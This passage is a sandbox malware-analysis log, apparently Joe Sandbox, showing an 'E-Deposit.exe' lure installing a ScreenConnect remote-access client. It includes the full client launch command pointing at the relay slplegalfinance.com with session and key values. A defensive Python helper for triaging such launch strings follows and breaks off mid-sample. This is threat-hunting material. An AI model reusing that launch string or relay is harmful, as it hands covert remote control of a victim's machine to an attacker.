Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: wtsapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: winsta.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: netapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: samcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: samlib.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: winnsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: rasman.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: rtutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: winhttp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: amsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: netutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: propsys.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Downloads\E-Deposit.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Persistence and Installation Behavior

Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll | COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\ScreenConnect.InstallerActions.dll
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\Downloads\c44d2632-26e1-42de-afb1-4cd72c859c46.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.Compression.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI71C1.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI6898.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\Downloads\Unconfirmed 367452.crdownload
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.Compression.Cab.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (484f9eed1d8e13b9)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\E-Deposit.exe | Process information set: NOOPENFILEERRORBOX (30 identical entries)
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX (17 identical entries)
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (32 identical entries)
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX (6 identical entries)
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Process information set: NOOPENFILEERRORBOX (47 identical entries)
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX (50 identical entries)
Source: C:\Users\user\Downloads\E-Deposit.exe Memory allocated: 18E0000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\E-Deposit.exe Memory allocated: 3300000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\E-Deposit.exe Memory allocated: 5300000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\E-Deposit.exe Memory allocated: 6AA0000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\E-Deposit.exe Memory allocated: 6200000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\E-Deposit.exe Memory allocated: 7AA0000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\E-Deposit.exe Memory allocated: 8AA0000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\E-Deposit.exe Memory allocated: 6AA0000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\E-Deposit.exe Memory allocated: 8D30000 memory reserve | memory write watch
Source: C:\Users\user\Downloads\E-Deposit.exe Memory allocated: 9D30000 memory reserve | memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Memory allocated: 19E0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Memory allocated: 21D0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Memory allocated: 1FE0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe Memory allocated: D60000 memory reserve | memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe Memory allocated: 1AA50000 memory reserve | memory write watch
Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Downloads\E-Deposit.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\ScreenConnect.InstallerActions.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.Compression.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI71C1.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe
Source: C:\Windows\SysWOW64\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6898.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.Compression.Cab.dll
Source: C:\Windows\System32\svchost.exe TID: 3032 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Downloads\E-Deposit.exe TID: 3108 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 7460 Thread sleep count: 38 > 30
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 7616 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation (2 identical entries)
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation (5 identical entries)
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation (3 identical entries)
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Users\user\Downloads\E-Deposit.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
Source: C:\Users\user\Downloads\E-Deposit.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Process token adjusted: Debug
Source: C:\Users\user\Downloads\E-Deposit.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Downloads\E-Deposit.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
Source: unknown Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.clientservice.exe" "?e=access&y=guest&h=slplegalfinance.com&p=443&s=316b6739-92f5-44b7-a8b7-61cbbec9d115&k=bgiaaackaabsu0exaagaaaeaaqdvyezobln8wdm6xwdr4b0uasubfhp2ejosdzugmbruwvwehsuh2lvfcfwdygcjbhcbews%2fdmahacpw1tkv%2f%2bw18tijthn%2bq%2fezavwugchdfdkaqki0lnydddccsozul7%2bvqevv9snfahoisjld7xdnlpmsw%2bw682fijikr8xbdhppukmg4ksp6kf1xba7kkmnnwss1mrxckdb%2f1hqrui%2fszzdgbjvz3tc%2f3cr0lxlngeclg7dt5irihwzjf5xutinhipesoo6bsk%2bufoecyo3bjvu6prl6uky08mjz7e%2b6foqb4actm6qtr9k%2fsvfdvwq%2br7eykwxpsy6ith4x7%2f%2bv"
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (3 identical entries)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 identical entries)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3 identical entries)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation (2 identical entries)
Source: C:\Users\user\Downloads\E-Deposit.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\ScreenConnect.Core.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation (6 identical entries)
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation (2 identical entries)
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation (2 identical entries)
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\Downloads\E-Deposit.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
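The most useful pivot on this page is the launch string in the "Process created" entry for ScreenConnect.ClientService.exe: it carries the relay host (h=), port (p=) and session id (s=) that the freshly installed client dials out to, which is how a legitimate-looking RMM binary ends up serving an attacker-controlled instance. The Python helper below is an added example, not part of the Joe Sandbox report or of ConnectWise's software. It pulls those fields out of a client command line, records the 16-hex-character tag from the install directory name (the report shows the same tag in the MSI staging path, so it can be used to pivot across hosts) and flags what a hunter would want flagged. Assumptions: the parameter meanings (e = session type, y = participant role, h/p = relay host and port, s = session id, k = key blob) are inferred from how the observed line reads, not taken from vendor documentation; KNOWN_RELAYS is a placeholder allowlist; the sample command line is constructed from the one in the report with the long k= blob shortened.

```python
import re
from urllib.parse import parse_qs

# Constructed placeholder allowlist: the relay host(s) your own ScreenConnect
# instance uses. Anything else dialling out from a client is worth a look.
KNOWN_RELAYS = {"support.example.com"}

GUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I)
# The install directory is "ScreenConnect Client (<16 hex chars>)"; the same tag
# appears in the MSI staging path in this report.
INSTANCE_RE = re.compile(r"ScreenConnect Client \(([0-9a-f]{16})\)", re.I)

ACCESS_FINDING = "session type is Access (unattended access, not a one-off support session)"


def extract_launch_params(cmdline: str) -> dict:
    """Return the key/value pairs from the quoted '?...' argument that
    ScreenConnect.ClientService.exe is launched with, or {} if there is none."""
    m = re.search(r'"\?([^"]*)"', cmdline)
    if not m:
        return {}
    # parse_qs percent-decodes, so the %2f/%2b in the k= blob come back as / and +
    return {k: v[0] for k, v in parse_qs(m.group(1), keep_blank_values=True).items()}


def triage(cmdline: str, known_relays=frozenset(KNOWN_RELAYS)) -> dict:
    """Classify one ScreenConnect client command line for hunting.
    Parameter semantics (e, y, h, p, s, k) are an assumption inferred from the
    observed launch string, not vendor documentation."""
    params = extract_launch_params(cmdline)
    result = {"is_screenconnect_launch": bool(params), "params": params, "findings": []}
    if not params:
        return result
    inst = INSTANCE_RE.search(cmdline)
    result["instance_tag"] = inst.group(1).lower() if inst else None

    host = params.get("h", "").lower()
    if not host:
        result["findings"].append("no relay host (h=) in launch string")
    elif host not in {h.lower() for h in known_relays}:
        result["findings"].append(
            f"relay host not in allowlist: {host}:{params.get('p', '?')}")
    if params.get("e", "").lower() == "access":
        result["findings"].append(ACCESS_FINDING)
    sid = params.get("s", "")
    if not GUID_RE.match(sid):
        result["findings"].append(f"session id is not a GUID: {sid!r}")
    return result


# Constructed sample modelled on the command line in this report: h=, p= and s=
# are the values the report shows, the k= blob is shortened to a placeholder.
SAMPLE = (
    r'"c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.clientservice.exe" '
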